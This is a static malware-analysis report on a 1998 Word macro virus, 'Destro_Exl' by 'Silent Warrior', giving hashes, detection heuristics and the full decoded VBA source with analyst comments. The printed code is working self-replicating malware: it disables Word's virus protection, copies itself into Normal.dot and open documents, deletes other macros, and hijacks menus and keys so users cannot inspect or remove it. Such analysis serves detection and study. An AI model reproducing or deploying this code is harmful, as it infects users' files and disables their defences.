Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 070de380734fd5d4…

MALICIOUS

Office (OLE)

98.5 KB Created: 2001-02-22 02:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2ef90a16583953c30e7b4bc6380dda85 SHA-1: e35ec2bab4fedc25df2065833ff749bcbc76dfae SHA-256: 070de380734fd5d467ad9eb1145c5cd71a3c8d9466eed3356a5c24985aae1b9f
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits critical heuristic firings for legacy WordBasic macro virus markers and VBA macros, specifically an AutoOpen macro. The ClamAV detection 'Doc.Trojan.Chack-2' strongly suggests malicious intent. The VBA module, named 'Destro_Exl', contains comments and subroutines characteristic of macro-based malware, likely designed to execute malicious actions when the document is opened.

Heuristics 5

  • ClamAV: Doc.Trojan.Chack-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chack-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Destro_Exl", Object:=wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6819 bytes
SHA-256: 8f3abaf5acbe460344ff9f7c7e4a477c6324b5073aa98c1777327c1a17569502
Detection
ClamAV: Doc.Trojan.Chack-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module header of the document's own class module (ThisDocument) as carved by
' olevba. In this extraction no procedures follow these attributes; the viral
' code is in the "Destro_Exl" module and the "Blood_Mask" form further down.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Header of the "Destro_Exl" module — the module name the code below preserves
' (together with "Blood_Mask" and "ThisDocument") when it deletes other components,
' and the name it copies into the global template via OrganizerCopy.
Attribute VB_Name = "Destro_Exl"
' Destro Exl Macros By Silent Warrior
' Blood Mask
' December 1998

' Kay sarap maglaro, kung alam mo ang iyong nilalaro
' Makiisa sa tahimik na labanan
' [analyst] The two lines above are Tagalog; approximate translation:
' "It is so fun to play, when you know what you are playing" /
' "Join the silent battle". They are author markers only and are not executed.

' kreeeeeez

' Module-level state shared by the routines below:
'   Superman - saved value of Application.DisplayAlerts, restored after each run
'   Batman   - set to 1 by AirGlider once it has copied a module into the active
'              document; The_Beatles re-saves the document when it is 1
'   Mario    - True when "Destro_Exl" already exists in the global template
'   Luigi    - True when "Destro_Exl" is found by AirGlider in either project
Public Superman
Public Batman
Public Mario
Public Luigi

' BMX: suppresses alerts and locks the user out of Word's macro tooling.
' It first stashes the current DisplayAlerts value in Superman so the callers
' (DestroExl, FileClose, FileSave, ...) can restore it afterwards.
' Host-side indicators of this routine having run: a hidden/locked "Visual Basic"
' toolbar, a missing Tools > Macro menu item, disabled Alt+F11 / Alt+F8 bindings
' in Normal.dot, and a Help-menu control captioned "Silent Warrior 1998".
Sub BMX()
    Superman = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    ' Indian turns off Options.VirusProtection and Options.SaveNormalPrompt.
    Call Indian
    ' DisableAutoMacros with argument 0 leaves auto macros such as AutoOpen enabled.
    WordBasic.DisableAutoMacros 0
    ' Hide the Visual Basic toolbar and protect it against being re-shown or customised.
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    ' Remove the Tools > Macro menu entry.
    CommandBars("Tools").Controls("Macro").Delete
    ' The key-binding changes below are stored in the global template so they persist.
    CustomizationContext = NormalTemplate
    ' Disable the keyboard routes to the VBA editor (Alt+F11) and the Macros dialog (Alt+F8).
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    ' Relabels the sixth control on the Help menu — a visible infection marker.
    CommandBars("Help").Controls(6).Caption = "Silent Warrior 1998"
    On Error GoTo 0
End Sub

' RollerBlade: infects the global template (Normal.dot).
' Mario becomes True when a "Destro_Exl" module is already present in Normal, in
' which case nothing is copied. Before that check completes, every component of
' Normal other than Destro_Exl / Blood_Mask / ThisDocument is deleted, which strips
' any pre-existing or competing macros from the template. Errors jump to the labels
' (Active_Balls / Inactive_Balls / NotMe) and are silently dropped.
Sub RollerBlade()
    Call Indian
    On Error GoTo Active_Balls
    Mario = False
    Set ActiveD = ActiveDocument
    Set NormalT = NormalTemplate
    On Error GoTo Inactive_Balls
    For i = 1 To NormalT.VBProject.VBComponents.Count
      NMacr = NormalT.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Mario = True
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NormalT.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Inactive_Balls:
    If Not (Mario) Then
      On Error GoTo NotMe
      ' Copies both viral modules from the open document into Normal through the
      ' Organizer API — this is the line matched by OLE_VBA_MACRO_VIRUS_REPLICATION.
      Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Destro_Exl", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=ActiveD.FullName, Destination:=NormalT.FullName, Name:="Blood_Mask", Object:=wdOrganizerObjectProjectItems
      ' Persist the modified template; the "save Normal?" prompt was disabled by Indian.
      Templates(NormalT.FullName).Save
NotMe:
    End If
Active_Balls:
End Sub

' AirGlider: pushes the "Blood_Mask" module from the global template into the
' active document. Luigi records whether "Destro_Exl" was seen in either project;
' Batman is set to 1 once a copy was made so The_Beatles knows to re-save the
' document. Note that only "Blood_Mask" is copied here, not "Destro_Exl".
Sub AirGlider()
    On Error GoTo Active_Wings
    Batman = 0
    Luigi = False
    Set ActiveD = ActiveDocument
    Set NormalT = NormalTemplate
    On Error GoTo Inactive_Wings
    For i = 1 To ActiveD.VBProject.VBComponents.Count
      NMacr = ActiveD.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Luigi = True
      ' The same index i is reused against the Normal project; from here on NMacr
      ' holds a Normal component name, and that name is what is deleted from ActiveD.
      NMacr = NormalT.VBProject.VBComponents(i).Name
      If NMacr = "Destro_Exl" Then Luigi = True
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=ActiveD.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Inactive_Wings:
    If Luigi = False Then
      On Error GoTo Erh2
    ' Copy direction here is template -> document (the reverse of RollerBlade).
    Application.OrganizerCopy Source:=NormalT.FullName, Destination:=ActiveD.FullName, Name:="Blood_Mask", Object:=wdOrganizerObjectProjectItems
      Batman = 1
Erh2:
    End If
Active_Wings:
End Sub

' QuickFixToAll: sweeps every open document. After infecting Normal (RollerBlade)
' it activates each document in turn, deletes any VBA component that is not on the
' whitelist, and saves the document if Peeks is set; then it runs AirGlider on every
' document and finally re-activates the document that was active on entry (its name
' is kept in Flip). Any error after the sweep jumps to DomainX and is dropped.
Sub QuickFixToAll()
    Call RollerBlade
    Flip = ActiveDocument.Name
    For j = 1 To Documents.Count
    Documents(j).Activate
    Set ActiveD = ActiveDocument
    For i = 1 To ActiveD.VBProject.VBComponents.Count
      ' An error inside the inner loop skips straight to the save check at FineLift.
      On Error GoTo FineLift
      NMacr = ActiveD.VBProject.VBComponents(i).Name
      ' Peeks reflects only the last component examined, not whether any deletion happened.
      If (NMacr <> "Destro_Exl") And (NMacr <> "Blood_Mask") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=ActiveD.FullName, Name:=NMacr, Object:=wdOrganizerObjectProjectItems
        Peeks = True
        Else
        Peeks = False
      End If
    Next i
FineLift:
    If Peeks Then ActiveDocument.Save
    Next j
    On Error GoTo DomainX
    For i = 1 To Documents.Count
        Documents(i).Activate
        Call AirGlider
    Next i
    ' Restore the originally active document so the sweep is not noticeable.
    For i = 1 To Documents.Count
        If Documents(i).Name = Flip Then Documents(i).Activate
    Next i
DomainX:
End Sub

' Indian: turns off the two Word options that would otherwise expose the infection —
' the macro-virus protection warning (Options.VirusProtection, the setting named in
' the OLE_VBA_MACRO_VIRUS_REPLICATION finding) and the prompt asking whether to save
' changes to the global template (Options.SaveNormalPrompt).
Sub Indian()
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
End Sub

' DestroExl: the main infection sequence — lock down the UI (BMX), infect the global
' template (RollerBlade), then restore the DisplayAlerts value BMX saved in Superman.
' Called from AutoOpen and from most of the intercepted built-in commands below.
Sub DestroExl()
    Call BMX
    Call RollerBlade
    Application.DisplayAlerts = Superman
End Sub

' The_Beatles: if AirGlider just copied a module into the active document (Batman = 1),
' re-save the document under its own name in Word document format — presumably so the
' inserted project is written to disk (confirm). Any error jumps to John_Lennon and is dropped.
Sub The_Beatles()
    On Error GoTo John_Lennon
Set ActiveD = ActiveDocument
    If Batman = 1 Then
       ActiveD.SaveAs FileName:=ActiveD.Name, FileFormat:=wdFormatDocument
    End If
John_Lennon:
End Sub

' AutoOpen: runs automatically when the document is opened (the OLE_VBA_AUTOOPEN
' match in the report). Errors are suppressed so a failed infection attempt never
' surfaces a dialog to the user.
Sub AutoOpen()
    On Error Resume Next
    Call DestroExl
End Sub

' FileClose: a macro with this name replaces Word's built-in File > Close command.
' Re-runs the three infection routines, restores DisplayAlerts, then performs the
' real close through WordBasic. The same intercept pattern is used by FileOpen,
' FileSave, FileSaveAs, FileExit and the other built-in command names below.
Sub FileClose()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    WordBasic.FileClose
End Sub

' FileOpen: intercepts File > Open. Infects first, shows the real Open dialog, then
' sweeps every open document (QuickFixToAll) and re-applies the lockdown and the
' document-side copy. Any error jumps to Digits, which still restores DisplayAlerts.
Sub FileOpen()
    On Error GoTo Digits
    Call DestroExl
    Dialogs(wdDialogFileOpen).Show
    Call QuickFixToAll
    Call BMX
    Call AirGlider
    Call The_Beatles
Digits:
    Application.DisplayAlerts = Superman
End Sub

' FileSave: intercepts File > Save. Runs the infection routines, restores DisplayAlerts,
' then saves the document only if it has unsaved changes; a save error jumps to Blade.
Sub FileSave()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    On Error GoTo Blade
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Blade:
End Sub

' FileSaveAs: intercepts File > Save As. Runs the infection routines, restores
' DisplayAlerts, then shows the real Save As dialog.
Sub FileSaveAs()
    Call BMX
    Call RollerBlade
    Call AirGlider
    Application.DisplayAlerts = Superman
    Dialogs(wdDialogFileSaveAs).Show
End Sub

' FileExit: intercepts File > Exit. Runs the infection routines and, when WeekDay(Date)
' is 6 (Friday under VBA's default Sunday-first week), shows the Blood_Mask form — the
' visible payload; a form error jumps to Heaven. Then exits Word through WordBasic.
Sub FileExit()
    Call BMX
    Call RollerBlade
    Call AirGlider
    On Error GoTo Heaven
    If WeekDay(Date) = 6 Then Blood_Mask.Show
Heaven:
    Application.DisplayAlerts = Superman
    WordBasic.FileExit
End Sub

' HelpAbout: replaces Help > About with the Blood_Mask form; a form error jumps to Hell.
Sub HelpAbout()
    On Error GoTo Hell
    Blood_Mask.Show
Hell:
End Sub

' ToolsOptions: shows the real Options dialog, then re-runs DestroExl — so any change
' the user makes to the virus-protection setting in that dialog is immediately
' reverted by Indian.
Sub ToolsOptions()
    Dialogs(wdDialogToolsOptions).Show
    Call DestroExl
End Sub

' FileNew: intercepts File > New. Re-runs the infection sequence, then shows the real New dialog.
Sub FileNew()
    Call DestroExl
    Dialogs(wdDialogFileNew).Show
End Sub

' FileTemplates: intercepts File > Templates. Only the infection sequence runs; the
' built-in Templates and Add-ins dialog is never shown.
Sub FileTemplates()
    Call DestroExl
End Sub

' ToolsMacro: intercepts Tools > Macro. Only the infection sequence runs; the Macros
' dialog is never shown, so the user cannot list or remove macros this way. This name
' is one of the markers behind the OLE_LEGACY_WORDBASIC_MACRO_VIRUS finding.
Sub ToolsMacro()
    Call DestroExl
End Sub

' ToolsCustomize: intercepts Tools > Customize. Only the infection sequence runs; the
' Customize dialog (which could restore the toolbar and menu items BMX removed) never appears.
Sub ToolsCustomize()
    Call DestroExl
End Sub

' ToolsCustomizeKeyboard: intercepts the keyboard-customisation command. Only the
' infection sequence runs; the dialog that could re-enable Alt+F11 / Alt+F8 never appears.
Sub ToolsCustomizeKeyboard()
    Call DestroExl
End Sub

' ViewVBCode: intercepts the command that opens the VBA editor. Only the infection
' sequence runs, so the viral source cannot be inspected through this route.
Sub ViewVBCode()
    Call DestroExl
End Sub

' Organizer: empty override of the Organizer command — selecting it does nothing,
' which blocks the built-in UI for copying or deleting project items between
' documents and templates (the same mechanism the code itself uses via OrganizerCopy).
Sub Organizer()
End Sub

' Header of the "Blood_Mask" module. The CommandButton1_Click handler and Me.Hide
' further down indicate this is a UserForm; the blank stretch that follows these
' attributes is presumably the form's non-textual content, which the olevba
' extraction does not render (confirm against the raw OLE stream).
Attribute VB_Name = "Blood_Mask"
Attribute VB_Base = "0{22040A93-0825-11D5-934E-0050DA64CF3A}{22040A81-0825-11D5-934E-0050DA64CF3A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

































' CommandButton1_Click: click handler of the form's button. Runs the infection entry
' point and the all-documents sweep from the Destro_Exl module, then hides the form.
' Errors are suppressed, so the button always appears to simply dismiss the dialog.
Private Sub CommandButton1_Click()
    On Error Resume Next
    Call Destro_Exl.DestroExl
    Call Destro_Exl.QuickFixToAll
    Me.Hide
End Sub